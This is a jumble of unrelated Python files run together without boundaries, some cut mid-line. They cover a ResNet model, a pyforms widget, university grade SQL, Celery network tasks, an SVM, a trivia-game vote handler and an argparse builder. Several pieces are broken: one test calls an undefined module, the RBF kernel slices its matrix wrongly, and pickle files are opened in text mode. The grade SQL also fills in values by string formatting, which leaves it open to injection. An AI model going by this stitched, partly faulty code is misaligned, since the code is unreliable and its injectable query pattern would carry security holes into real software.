x = self.relu(x) if TRACK_FEAT: SHARED_LIST.append(x) x = self.maxpool(x) x = self.layer1(x) low_level_feats.append(x) x = self.layer2(x) low_level_feats.append(x) x = self.layer3(x) low_level_feats.append(x) x = self.layer4(x) return x, low_level_feats def _load_pretrained_model(model, url=None, path=None): if url is not None: pretrain_dict = model_zoo.load_url(url) else: pretrain_dict = torch.load(path) model_dict = {} state_dict = model.state_dict() for k, v in pretrain_dict.items(): # print(k) if k in state_dict: model_dict[k] = v else: print(k) state_dict.update(model_dict) model.load_state_dict(state_dict) def ResNet50(output_stride, ibn_mode='none', pretrained=True): """Constructs a ResNet-50 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 6, 3], output_stride, ibn_mode) if pretrained: if ibn_mode == 'none': _load_pretrained_model(model, url='https://download.pytorch.org/models/resnet50-19c8e357.pth') elif ibn_mode == 'a' or ibn_mode == 'ab' or ibn_mode == 's': _load_pretrained_model(model, path='pretrained/resnet50_ibn_a.pth') elif ibn_mode == 'b': _load_pretrained_model(model, path='pretrained/resnet50_ibn_b.pth') else: raise NotImplementedError return model def ResNet101(output_stride, ibn_mode='none', pretrained=True): """Constructs a ResNet-101 model. 
Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 23, 3], output_stride, ibn_mode) if pretrained: if ibn_mode == 'none': _load_pretrained_model(model, url='https://download.pytorch.org/models/resnet101-5d3b4d8f.pth') elif ibn_mode == 'a' or ibn_mode == 'ab' or ibn_mode == 's': _load_pretrained_model(model, path='pretrained/resnet101_ibn_a.pth') elif ibn_mode == 'b': _load_pretrained_model(model, path='pretrained/resnet101_ibn_b.pth') else: raise NotImplementedError return model if __name__ == "__main__": import torch model = ResNet101(output_stride=8, ibn_mode='a', pretrained=True) input = torch.rand(1, 3, 512, 512) output, low_level_feat = model(input) print(output.size()) print(low_level_feat.size()) default_app_config = 'libs.core.cms.api.apps.CMSConfig' Jess3Jane/pyforms from pyforms.terminal.Controls.ControlFile import ControlFile from pyforms.terminal.Controls.ControlSlider import ControlSlider from pyforms.terminal.Controls.ControlText import ControlText from pyforms.terminal.Controls.ControlCombo import ControlCombo from pyforms.terminal.Controls.ControlCheckBox import ControlCheckBox from pyforms.terminal.Controls.ControlBase import ControlBase from pyforms.terminal.Controls.ControlDir import ControlDir from pyforms.terminal.Controls.ControlNumber import ControlNumber from datetime import datetime, timedelta import argparse, uuid, os, shutil, time, sys, subprocess import simplejson as json try: import requests except: print("No requests lib") class BaseWidget(object): def __init__(self, *args, **kwargs): self._parser = argparse.ArgumentParser() self._controlsPrefix = '' self._title = kwargs.get('title', args[0] if len(args)>0 else '') self.stop = False self._conf = kwargs.get('load', None) ############################################################################ ############ Module functions ############################################# ############################################################################ def init_form(self, parse=True): result = {} for fieldname, var in self.controls.items(): name = var._name if isinstance(var, ( ControlFile, ControlSlider, ControlText, ControlCombo,ControlCheckBox, ControlDir, ControlNumber ) ): self._parser.add_argument("--%s" % name, help=var.label) if parse: self._parser.add_argument('terminal_mode', type=str, default='terminal_mode', help='Flag to run pyforms in terminal mode') self._parser.add_argument( "--exec{0}".format(self._controlsPrefix), default='', help='Function from the application that should be executed. 
Use | to separate a list of functions.') self._parser.add_argument( "--load{0}".format(self._controlsPrefix), default=None, help='Load a json file containing the pyforms form configuration.') self._args = self._parser.parse_args() self.__parse_terminal_parameters() self.__execute_events() def load_form(self, data, path=None): allparams = self.controls if hasattr(self, 'load_order'): for name in self.load_order: param = allparams[name] if name in data: param.load_form(data[name]) else: for name, param in allparams.items(): if name in data: param.load_form(data[name]) def __parse_terminal_parameters(self): for fieldname, var in self.controls.items(): name = var._name if self._args.__dict__.get(name, None): if isinstance(var, ControlFile): value = self._args.__dict__[name] if value!=None and (value.startswith('http://') or value.startswith('https://')): local_filename = value.split('/')[-1] outputFileName = os.path.join('input', local_filename) self.__downloadFile(value, outputFileName) var.value = outputFileName else: var.value = value if isinstance(var, ControlDir): value = self._args.__dict__[name] var.value = value elif isinstance(var, (ControlText, ControlCombo)): var.value = self._args.__dict__[name] elif isinstance(var, ControlCheckBox): var.value = self._args.__dict__[name]=='True' elif isinstance(var, (ControlSlider, ControlNumber) ): var.value = int(self._args.__dict__[name]) if self._args.load: print('\n--------- LOADING CONFIG ------------------') with open(self._args.load) as infile: data = json.load(infile) self.load_form(data, os.path.dirname(self._args.load)) print('--------- END LOADING CONFIG --------------\n') elif self._conf is not None: print('\n--------- LOADING DEFAULT CONFIG ------------------') self.load_form(self._conf, '.') print('--------- END LOADING DEFAULT CONFIG --------------\n') def __execute_events(self): for function in self._args.__dict__.get("exec{0}".format(self._controlsPrefix), []).split('|'): if len(function)>0: getattr(self, function)() res = {} for controlName, control in self.controls.items(): res[controlName] = {'value': control.value } with open('out-parameters.txt', 'w') as outfile: outfile.write( str(res) ) def __downloadFile(self, url, outFilepath): chunksize = 512*1024 r = requests.get(url, stream=True) with open(outFilepath, 'w') as f: for chunk in r.iter_content(chunk_size=chunksize): if chunk: f.write(chunk); f.flush(); def execute(self): pass def start_progress(self, total = 100): self._total_processing_count = total self._processing_initial_time = time.time() self._processing_count = 1 def update_progress(self): div = int(self._total_processing_count/400) if div==0: div = 1 if (self._processing_count % div )==0: self._processing_last_time = time.time() total_passed_time = self._processing_last_time - self._processing_initial_time remaining_time = ( (self._total_processing_count * total_passed_time) / self._processing_count ) - total_passed_time if remaining_time<0: remaining_time = 0 time_remaining = datetime(1,1,1) + timedelta(seconds=remaining_time ) time_elapsed = datetime(1,1,1) + timedelta(seconds=(total_passed_time) ) values = ( time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_remaining.day-1, time_remaining.hour, time_remaining.minute, time_remaining.second, (float(self._processing_count)/float(self._total_processing_count))*100.0, self._processing_count, self._total_processing_count, ) print("Elapsed: %d:%d:%d:%d; Remaining: %d:%d:%d:%d; Processed %0.2f %% (%d/%d); | \r" % values) 
sys.stdout.flush() self._processing_count += 1 def end_progress(self): self._processing_count = self._total_processing_count self.update_progress() def __savePID(self, pid): try: with open('pending_PID.txt', 'w') as f: f.write(str(pid)) f.write('\n') except (IOError) as e: raise e def __savePID(self, pid): try: with open('pending_PID.txt', 'w') as f: f.write(str(pid)) f.write('\n') except (IOError) as e: raise e def executeCommand(self, cmd, cwd=None, env=None): if cwd!=None: currentdirectory = os.getcwd() os.chdir(cwd) print(" ".join(cmd)) proc = subprocess.Popen(cmd) if cwd!=None: os.chdir(currentdirectory) self.__savePID(proc.pid) proc.wait() #(output, error) = proc.communicate() #if error: print 'error: ', error #print 'output: ', output return ''#output def exec_terminal_cmd(self, args, **kwargs): print('TERMINAL <<',' '.join(args) ) sys.stdout.flush() proc = subprocess.Popen(args, **kwargs) self.__savePID(proc.pid) proc.wait() sys.stdout.flush() @property def controls(self): """ Return all the form controls from the the module """ result = {} for name, var in vars(self).items(): if isinstance(var, ControlBase): var._name = self._controlsPrefix+"-"+name if len(self._controlsPrefix)>0 else name result[name] = var return resultUPDATE_GRADE = ''' UPDATE cw_rec SET cw_rec.grd = '{grade}' WHERE jenzcrs_rec.coursekey = '{coursekey}' AND cw_rec.id = {student_number} AND cw_rec.yr = SUBSTRING(jenzcrs_rec.coursekey FROM 1 FOR 4) AND cw_rec.cat = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(coursekey))-8 FOR 4 ) AND cw_rec.sess = SUBSTRING(jenzcrs_rec.coursekey FROM 6 FOR 2) AND cw_rec.prog = right(trim(jenzcrs_rec.coursekey),4) AND cw_rec.crs_no = SUBSTRING( jenzcrs_rec.coursekey FROM 9 for INSTR(jenzcrs_rec.coursekey,';',9)-9 ) AND cw_rec.sec = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(jenzcrs_rec.coursekey))-11 FOR 2 ) AND cw_rec.stat IN ('R', 'A', 'T','N','I') '''.format SELECT_GRADE = ''' SELECT * FROM cw_rec, jenzcrs_rec WHERE jenzcrs_rec.coursekey = '{coursekey}' AND cw_rec.id = {student_number} AND cw_rec.yr = SUBSTRING(jenzcrs_rec.coursekey FROM 1 FOR 4) AND cw_rec.cat = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(coursekey))-8 FOR 4 ) AND cw_rec.sess = SUBSTRING(jenzcrs_rec.coursekey FROM 6 FOR 2) AND cw_rec.prog = right(trim(jenzcrs_rec.coursekey),4) AND cw_rec.crs_no = SUBSTRING( jenzcrs_rec.coursekey FROM 9 for INSTR(jenzcrs_rec.coursekey,';',9)-9 ) AND cw_rec.sec = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(jenzcrs_rec.coursekey))-11 FOR 2 ) AND cw_rec.stat IN ('R', 'A', 'T','N','I') '''.format early_projects/test_prefixes.py import unittest import prefixes class TestPrefixes(unittest.TestCase): """Tests prefixes.""" def test_above_freezing_above(self): """Test a temperature that is above freezing.""" expected = True actual = temperature.above_freezing(5.2) self.assertEqual(expected, actual, "The temperature is above freezing.") unittest.main() # author: # 18 February 2020 # Bremen def listsort(array): for p in range(len(array)): _ = p for q in range(len(array)-1): while(array[q] > array[q+1]): for i, j in zip(range(len(array)-1), range(1,len(array))): if array[i] > array[j]: array[i], array[j] = array[j], array[i] elif array[i] == array[j]: array[i], array[j] = array[i], array[j] exit return array drop.py #!/usr/bin/env python import argparse from pymongo import MongoClient from dcctools.config import Configuration def parse_args(): parser = argparse.ArgumentParser() parser.add_argument( "--config", default="config.json", help='Configuration file 
(default "config.json")', ) args = parser.parse_args() return args if __name__ == "__main__": args = parse_args() c = Configuration(args.config) client = MongoClient(c.mongo_uri) database = client.linkage_agent database.match_groups.drop() database.household_match_groups.drop() print("Database cleared.") 100-1000 import env_check from crontab import CronTab import os import sys import getopt def set_crontab(): user_cron = CronTab(user=True) script_path = os.path.join(os.getcwd(), 'main.py') job = user_cron.new(command=f'python3 {script_path}') try: exec_h = int(input('脚本需要每几小时执行一次?')) # TODO: 或许可以加上个检查,如果当天报过了就不再报? except ValueError: raise ValueError('emmm,输入数字就行哈') if not 0 < exec_h <= 24: raise ValueError('emmm,输得不对? 输入范围应该是(0, 24]中的整数哦') job.hour.every(exec_h) job.enable() user_cron.write() def reset_crontab(): user_cron = CronTab(user=True) script_path = os.path.join(os.getcwd(), 'main.py') count = 0 for job in user_cron: if job.command == f'python3 {script_path}': user_cron.remove(job) user_cron.write() count += 1 print(f'成功清除{count}项定时任务~') if __name__ == '__main__': opts, args = getopt.getopt(sys.argv[1:], 'c') is_reset = False for cmd, arg in opts: if cmd == '-c': is_reset = True if is_reset: reset_crontab() else: set_crontab() # -*- coding: utf-8 -*- import os def get_data_dir(): curr_dir = os.path.dirname(os.path.realpath(__file__)) data_dir = curr_dir+"/../../../../data" return(data_dir) def get_output_dir(): curr_dir = os.path.dirname(os.path.realpath(__file__)) output_dir = curr_dir+"/../../../../output" return(output_dir)import csv # Documentation # https://docs.python.org/3.7/library/csv.html # csv.reader already splits the list data so daae[0] works out of the box. def readcsv(filepath): ''' Read file in filepath, return all rows as a list type. Call function: ```readcsv('data/file0.csv')``` ''' with open(filepath, newline='', encoding='utf-8') as data: data = csv.reader(data, delimiter=',', quotechar='|') rowofdata = [] for row in data: rowofdata.append(row) return rowofdata # print(readcsv('data/file0.csv')) # expected output [['file0,line0'], ['file0,line1'], ['file0,line2'], ['file0,line3'], ['file0,line4'], ['file0,line5']] # -*- coding: utf-8 -*- from celery.utils.log import get_task_logger from networkapi import celery_app from networkapi.api_network.facade import v3 as facade from networkapi.api_task.classes import BaseTask from networkapi.usuario.models import Usuario logger = get_task_logger(__name__) @celery_app.task(bind=True, base=BaseTask) def create_networkv4(self, net_dict, user_id): msg = { 'object_type': 'networkv4', 'action': 'allocate', } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) try: net = facade.create_networkipv4(net_dict, user) except Exception, exception: msg['message'] = 'NetworkV4 was not allocated.' 
msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was allocated with success.'.format(net) msg['object_id'] = net.id return msg @celery_app.task(bind=True, base=BaseTask) def update_networkv4(self, net_dict, user_id): msg = { 'object_type': 'ipv4', 'action': 'update', 'object_id': net_dict.get('id') } self.update_state( state='PROGRESS', meta=msg ) net_obj = facade.get_networkipv4_by_id(net_dict.get('id')) user = Usuario.objects.get(id=user_id) try: facade.update_networkipv4(net_dict, user) except Exception as exception: msg['message'] = 'NetworkV4 {} was not updated.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was updated with success.'.format( net_obj) return msg @celery_app.task(bind=True, base=BaseTask) def delete_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'deallocate', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) net_obj = facade.get_networkipv4_by_id(net_id) try: facade.delete_networkipv4(net_id) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deallocated.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was deallocated with success.'.\ format(net_obj) return msg @celery_app.task(bind=True, base=BaseTask) def deploy_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'deploy', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) net_obj = facade.get_networkipv4_by_id(net_id) try: networkv4 = net_obj.networkv4 status_deploy = facade.deploy_networkipv4(net_id, user) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deployed.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was deployed with success. {}'.format( networkv4, status_deploy) return msg @celery_app.task(bind=True, base=BaseTask) def undeploy_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'undeploy', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) net_obj = facade.get_networkipv4_by_id(net_id) try: networkv4 = net_obj.networkv4 status_deploy = facade.undeploy_networkipv4(net_id, user) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deployed.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was undeployed with success. {}'.\ format(networkv4, status_deploy) return msg 1-10 import numpy as np class BinaryClassificationSVM(object): """ This class implements binary classification SVM. Args: C(float): Regularization factor. Default 0. kernel(str): Kernel function. {"linear": linear kernel, "poly": polynomial kernel, "rbf": radial basis kernel, "sigmoid": sigmoid kernel.} gamma: Parameter in poly/rbf/sigmoid kernel. degree: Parameter in poly kernel. coef: Constant parameter in poly/sigmoid kernel. Attributes: alpha: coefficient of each vector in classifier. b: constant coefficient in classifier. Methods: fit(x, y, max_iteration=100): Fit the SVM model according to the given training data. predict(x): Perform classification on samples in X. """ def __init__(self, C=0.0, kernel="linear", gamma=None, degree=3, coef=1): """ Constructor method. 
""" self.C = C self.kernel = kernel self.gamma = gamma self.degree = degree self.coef = coef self.alpha = None self.b = 0 self.x = None self.y = None self.kernel_matrix = None def fit(self, x, y, max_iteration=100): """ Fit the SVM model according to the given training data. Args: x: Array of data. Shape {amount_of_data, number_of_dimension_of_each_data} y: Labels of data. Class should be represented by -1/1. Shape {amount_of_data, } max_iteration(int): Maximum iteration times of SMO algorithms. Default 100. Return: object: SVM model """ self.x = x self.y = y self.alpha = np.zeros([y.shape[0]]) self.kernel_matrix = self.__kernel(self.x, self.x) for i in range(max_iteration): if self.__iteration() == -1: break return self def predict(self, x): """ Perform classification on samples in X. Return: Labels of data. Shape {amount_of_data, } """ kernel = self.__kernel(x, self.x) gx = np.sum(kernel * self.alpha * self.y, axis=1) + self.b return np.sign(gx).astype(np.int) def __iteration(self): """ Find alpha1 alpha2 and update the value. """ new_index_1 = None gx = np.sum(self.kernel_matrix * self.alpha * self.y, axis=1) + self.b ex = gx - self.y for i in range(self.alpha.shape[0]): if 0 < self.alpha[i] < self.C and gx[i] * self.y[i] != 1: new_index_1 = i break if new_index_1 is None: for i in range(self.alpha.shape[0]): if self.alpha[i] == 0 and gx[i] * self.y[i] < 1: new_index_1 = i break if self.alpha[i] == self.C and gx[i] * self.y[i] > 1: new_index_1 = i break if new_index_1 is None: return -1 _ex = np.abs(ex.copy() - ex[new_index_1]) _ex[new_index_1] = -np.inf new_index_2 = np.argmax(_ex) eta = self.kernel_matrix[new_index_1, new_index_1] + \ self.kernel_matrix[new_index_2, new_index_2] - \ self.kernel_matrix[new_index_1, new_index_2] * 2 new_value_2 = self.y[new_index_2] * (ex[new_index_1] - ex[new_index_2]) / eta + self.alpha[new_index_2] if self.y[new_index_1] != self.y[new_index_2]: _l = max(0, self.alpha[new_index_2] - self.alpha[new_index_1]) _h = min(self.C, self.C + self.alpha[new_index_2] - self.alpha[new_index_1]) else: _l = max(0, self.alpha[new_index_2] + self.alpha[new_index_1] - self.C) _h = min(self.C, self.alpha[new_index_2] + self.alpha[new_index_1]) if new_value_2 > _h: new_value_2 = _h if new_value_2 < _l: new_value_2 = _l new_value_1 = self.y[new_index_1] * self.y[new_index_2] * (self.alpha[new_index_2] - new_value_2) + \ self.alpha[new_index_1] b1 = -ex[new_index_1] - \ self.y[new_index_1] * self.kernel_matrix[new_index_1, new_index_1] * (new_value_1 - self.alpha[new_index_1]) - \ self.y[new_index_2] * self.kernel_matrix[new_index_2, new_index_1] * (new_value_2 - self.alpha[new_index_2]) + \ self.b b2 = -ex[new_index_2] - \ self.y[new_index_1] * self.kernel_matrix[new_index_1, new_index_2] * (new_value_1 - self.alpha[new_index_1]) - \ self.y[new_index_2] * self.kernel_matrix[new_index_2, new_index_2] * (new_value_2 - self.alpha[new_index_2]) + \ self.b self.b = (b1 + b2) / 2 self.alpha[new_index_1] = new_value_1 self.alpha[new_index_2] = new_value_2 return 0 def __kernel(self, x, y): """ Calculate kernel value between data in x and data in y. 
Return: Kernel , shape {amount_of_data_in_x, amount_of_data_in_y} """ res = None if self.kernel == "linear": res = np.dot(x, y.T) if self.gamma is None: self.gamma = 1 / self.x.shape[1] if self.kernel == "poly": res = np.dot(x, y.T) * self.gamma + self.coef res = res ** self.degree if self.kernel == "rbf": res = np.array([np.sum((y - x[i]) ** 2, axis=1) for i in range(x.shape[0])]) res = np.exp(-self.gamma * res[1:]) if self.kernel == "sigmoid": res = np.dot(x, y.T) * self.gamma - self.coef res = np.tanh(res) return np.reshape(res, [x.shape[0], y.shape[0]]) # in case that x/y contains only one data. aibenStunner/HackerRank #!/bin/python3 import math import os import random import re import sys # Complete the findDigits function below. def findDigits(n): count = 0 for num in str(n): try: if n % int(num) == 0: count += 1 except ZeroDivisionError: pass return count if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') t = int(input()) for t_itr in range(t): n = int(input()) result = findDigits(n) print(result) fptr.write(str(result) + '\n') fptr.close() L-F-A/Machine-Learning0 import pickle #Saving or loading a particular model. Meaning saving or loading an object containing #the different parameters of one ML model # #If saving, should looks like: #object = Object() #filehandler = open(filename, 'w') #pickle.dump(object, filehandler) # #If loading, should looks like: #filehandler = open(filename, 'r') #object = pickle.load(filehandler) def SaveLoadModel(filename,action='s',obj=None): if action is 's': object_to_save = obj file_obj = open(filename, 'w') pickle.dump(object_to_save, file_obj) return 0. elif action is 'L': filehandler = open(filename,'r') return pickle.load(filehandler) tomiyee/6.08-Final-Project0 import json import sqlite3 import os import random bluffalo_db = os.path.dirname(__file__) + '/game_data.db' word_db = os.path.dirname(__file__) + '/../word-database/word_bank.db' # Note json.loads(String) and json.dumps(Objects) def vote (request): """ Given the POST request with: String room_code - The characters that rep the room code String user - The user name of the person who is voting Int choice - The index of the bluff (0-indexed) in Returns number of people who haven't voted yet? 
""" request_form = request['form'] if 'room_code' not in request_form: return "Misssing Room Code" if 'user' not in request_form: return "Misssing User Name" if 'choice' not in request_form: return "Misssing Choice Number" room_code = request_form['room_code'].strip() user = request_form['user'].strip() choice_index = int(request_form['choice']) # Connect to the SQL Database and try to find the room_code conn = sqlite3.connect(bluffalo_db) connection = conn.cursor() room_rows = connection.execute('''SELECT game_data FROM game_table WHERE room_code = ?;''', (room_code,)).fetchall() # Return an error if there is not a room with the room code if len(room_rows) == 0: conn.commit() conn.close() return "Room does not exist" # Loads the dictionary and the short cut variables room_data = json.loads(room_rows[0][0]) game_data = room_data['game_data'] player_data = room_data['player_data'] # Generates the set of alphebetically sorted bluffs bluffs = set() for player in player_data: if not player_data[player]['submitted']: bluffs.add("No Submission") else: bluffs.add(player_data[player]['submission']) bluffs.remove(player_data[user]['submission']) # Add the Correct Answer round_number, question_number = game_data['round_number'], game_data['question_number'] word_number = (round_number - 1) * 3 + question_number - 1 current_word, current_meaning, current_ans = game_data['all_prompts'][word_number] bluffs.add(current_ans) # Sorts all the options in alphabetical order bluffs = sorted(list(bluffs)) if bluffs[choice_index] == current_ans: player_data[user]['voted_correctly'] = True # Finds all players whose bluff was the choice and appends the name of the user for player in player_data: if not player_data[player]['submitted']: continue if room_data['player_data'][player]['submission'] == bluffs[choice_index]: room_data['player_data'][player]['votes_received'].append(user) # records that the user has votes player_data[user]['voted'] = True # Count number of people who have not voted num_no_vote = len([p for p in player_data if not player_data[p]['voted']]) # Handle Transition to Submission State if num_no_vote == 0: # Reset the Submission Status of all the players in the game for player in room_data['player_data']: player_data[player]['submitted'] = False # Toggle the Game State Variables room_data["game_data"]['waiting_for_votes'] = False room_data["game_data"]['waiting_for_submissions'] = True # Tally Scores for player in player_data: # Points for fooling others player_data[player]['score'] += ( 500 * game_data['round_number'] * len(room_data['player_data'][player]['votes_received'])) # Points for right answer player_data[player]['score'] += ( 1000 * player_data[player]['voted_correctly']) * game_data['round_number'] # Move on to next question if game_data['question_number'] == 3: game_data['round_number'] += 1 game_data['question_number'] = 1 elif game_data['round_number'] == 3: # Begin endgame room_data["game_data"]['waiting_for_submissions'] = False room_data["game_data"]['in_lobby'] = True pass else: game_data['question_number'] += 1 new_room_json = json.dumps(room_data) connection.execute('''UPDATE game_table SET game_data =? 
WHERE room_code =?;''', (new_room_json, room_code)).fetchall() conn.commit() # commit commands conn.close() # close connection to database return 'There are ' + str(num_no_vote) + ' player(s) who have not voted this round' import random from scipy.spatial import distance def euc(a, b): return distance.euclidean(a, b) class ScrappyKNN(): def fit(self, X_train, y_train): self.X_train = X_train self.y_train = y_train def predict(self, X_test): predictions = [] for row in X_test: #label = self.closest(row) label=random.choice(self.y_train) predictions.append(label) return predictions def closest(self, row): best_dist = euc(row, self.X_train[0]) best_index = 0 for i in range(1, len(self.X_train)): dist = euc(row, self.X_train[i]) if dist < best_dist: best_dist = dist best_index = i return self.y_train[best_index] from sklearn.datasets import load_iris from sklearn import tree iris = load_iris() X = iris.data y = iris.target from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5) #from sklearn.neighbors import KNeighborsClassifier my_classifier = ScrappyKNN() my_classifier.fit(X_train, y_train) predictions = my_classifier.predict(X_test) from sklearn.metrics import accuracy_score print(accuracy_score(y_test, predictions)) #!/usr/local/bin/python2 # AQUI ELE JA ABRE E FECHA UM ARQUIVO with open('pessoas.csv') as arquivo: for registro in arquivo: print('nome: {}, idade: {}'.format(*registro.strip().split(','))) if arquivo.closed: print("o arquivo foi fechado!!")import os import numpy as np from pwtools.common import is_seq, file_write from .testenv import testdir def test_is_seq(): fn = os.path.join(testdir, 'is_seq_test_file') file_write(fn, 'lala') fd = open(fn , 'r') for xx in ([1,2,3], (1,2,3), np.array([1,2,3])): print(type(xx)) assert is_seq(xx) is True for xx in ('aaa', fd): print(type(xx)) assert is_seq(xx) is False fd.close() agpypeline/algorithm.py """Template class for a Transformer Algorithm """ from agpypeline.environment import Environment, CheckMD class Algorithm: """Class for containing a Transformer Algorithm """ def __init__(self): """Initializes a class instance """ def perform_process(self, environment: Environment, check_md: CheckMD, transformer_md: dict, full_md: list) -> dict: """Perform the processing of data Arguments: environment: instance of Environment class check_md: metadata for this Transformer execution run transformer_md: transformer specific information from previous runs full_md: the list of loaded metadata """ # pylint: disable=unused-argument,no-self-use raise RuntimeError("The Algorithm class method perform_process() must be overridden by a derived class") """A builder class for :class:`argparse.ArgumentParser`.""" from argparse import ArgumentParser, BooleanOptionalAction __all__ = ['ArgParseBuilder'] _subcommand_name = 'subcommand_name' # attribute name in result _subcommand_func = 'subcommand_func' # attribute name in result class ArgParseBuilder: """Builder for an :class:`~argparse.ArgumentParser`. Takes the same ``kwargs`` as :class:`~argparse.ArgumentParser`, but ``allow_abbrev`` defaults to ``False``, ``add_help`` is ignored and always ``False``, and from ``prefix_chars`` the first character is used for all options/flags. All methods except :meth:`finish` return ``self``. 
:param parser_class: the argument parser class; defaults to :class:`~argparse.ArgumentParser` :type parser_class: argparse.ArgumentParser :param kwargs: see :class:`~argparse.ArgumentParser` """ def __init__(self, *, parser_class=None, **kwargs): if parser_class is not None and ( not isinstance(parser_class, type) or not issubclass(parser_class, ArgumentParser)): raise TypeError("'parser_class' must be a subclass of" " argparse.ArgumentParser") if 'allow_abbrev' not in kwargs: kwargs['allow_abbrev'] = False kwargs['add_help'] = False if parser_class: self._parser = parser_class(**kwargs) else: self._parser = ArgumentParser(**kwargs) if kwargs.get('fromfile_prefix_chars') is not None: self._parser.convert_arg_line_to_args = lambda line: line.split() self._short_prefix = self._parser.prefix_chars[0] self._long_prefix = self._parser.prefix_chars[0] * 2 self._arg_group = None self._xcl_group = None self._subcommands_attrs = dict(title='subcommands', dest=_subcommand_name) self._subparsers = None self._subcommand = None def set_description(self, descr): """Set the ``description`` attribute of the parser. :param str descr: description string """ self._parser.description = descr return self def set_epilog(self, epilog): """Set the ``epilog`` attribute of the parser. :param str epilog: epilog string """ self._parser.epilog = epilog return self def _add_argument(self, short=None, long=None, **kwargs): """Call :meth:`~argparse.ArgumentParser.add_argument`. ``kwargs``: all arguments after ``name or flags...`` (for positional arguments use ``dest`` for the name) """ options_or_flags = [] if short: options_or_flags.append(self._short_prefix + short) if long: options_or_flags.append(self._long_prefix + long) if self._xcl_group: self._xcl_group.add_argument(*options_or_flags, **kwargs) elif self._arg_group: self._arg_group.add_argument(*options_or_flags, **kwargs) elif self._subcommand: self._subcommand.add_argument(*options_or_flags, **kwargs) else: self._parser.add_argument(*options_or_flags, **kwargs) return self def add_help(self, short='h', long='help', *, help='show this help message and exit'): """Add help. :param str short: short option :param str long: long option :param str help: help text """ self._add_argument(short, long, help=help, action='help') return self def add_version(self, short='V', long='version', *, version=None, string=None, help='show version and exit'): """Add version. If ``string`` is set it will be printed, else if ``version`` is set the resulting string will be ``prog + ' ' + version``. :param str short: short option :param str long: long option :param version: version; if it is a :class:`tuple` it will be converted to a string :type version: string or tuple :param string: version string :param str help: help text """ if isinstance(version, tuple): version = '.'.join(map(str, version)) if version and not string: string = f'{self._parser.prog} {version}' if string: self._add_argument(short, long, help=help, action='version', version=string) return self def add_flag(self, short=None, long=None, *, count=False, dest=None, const=None, help=None): """Add flag. :param str short: short option :param str long: long option :param bool count: if ``True`` count the number of times the flag occurs :param str dest: name of the list to which the values will be appended; ignored if ``count`` is set :param const: only used if ``dest`` is set; defaults to the flag name :param str help: help text If ``long`` ends with ``|no``, a negative flag will be added, i.e. 
for a flag ``--foo`` there will be a flag ``--no-foo``. In this case ``count`` and ``dest`` will be ignored. """ if long and long.endswith('|no'): self._add_argument(short, long[:-3], action=BooleanOptionalAction, help=help) elif count: self._add_argument(short, long, action='count', default=0, help=help) elif dest: if const is None: const = long or short self._add_argument(short, long, action='append_const', dest=dest, const=const, help=help) else: self._add_argument(short, long, action='store_true', help=help) return self def add_opt(self, short=None, long=None, *, type=None, nargs=None, default=None, const=None, choices=None, required=False, multiple=False, metavar=None, help=None): """Add option. :param str short: short option :param str long: long option :param type: see :meth:`~argparse.ArgumentParser.add_argument` :param nargs: see :meth:`~argparse.ArgumentParser.add_argument` :param default: see :meth:`~argparse.ArgumentParser.add_argument` :param const: see :meth:`~argparse.ArgumentParser.add_argument` :param choices: see :meth:`~argparse.ArgumentParser.add_argument` :param required: see :meth:`~argparse.ArgumentParser.add_argument` :param bool multiple: if ``True`` this option can be used multiple times and all values are appended to a list :param metavar: see :meth:`~argparse.ArgumentParser.add_argument` :param str help: help text """ if const is not None and not nargs: nargs = '?' action = None elif multiple: action = 'append' else: action = 'store' self._add_argument(short, long, type=type, nargs=nargs, default=default, const=const, choices=choices, metavar=metavar, required=required, help=help, action=action) return self def add_pos(self, name, *, type=None, nargs=None, default=None, choices=None, metavar=None, help=None): """Add positional argument. :param str name: name of argument :param type: see :meth:`~argparse.ArgumentParser.add_argument` :param nargs: see :meth:`~argparse.ArgumentParser.add_argument` :param default: see :meth:`~argparse.ArgumentParser.add_argument` :param choices: see :meth:`~argparse.ArgumentParser.add_argument` :param metavar: see :meth:`~argparse.ArgumentParser.add_argument` :param str help: help text """ self._add_argument(dest=name, type=type, nargs=nargs, default=default, choices=choices, metavar=metavar, help=help) return self def add_mutually_exclusive_group(self, required=False): """Add mutually exclusive group. See: :meth:`argparse.ArgumentParser.add_mutually_exclusive_group` """ if self._arg_group: self._xcl_group = self._arg_group.add_mutually_exclusive_group( required=required) elif self._subcommand: self._xcl_group = self._subcommand.add_mutually_exclusive_group( required=required) else: self._xcl_group = self._parser.add_mutually_exclusive_group( required=required) return self def finish_mutually_exclusive_group(self): """Finish mutually exclusive group. Adding a new mutually exclusive or argument group or a subcommand will finish a current mutually exclusive group implicitly. """ self._xcl_group = None return self def add_argument_group(self, title=None, description=None): """Add argument group. See: :meth:`argparse.ArgumentParser.add_argument_group` """ self._xcl_group = None if self._subcommand: self._arg_group = self._subcommand.add_argument_group( title, description) else: self._arg_group = 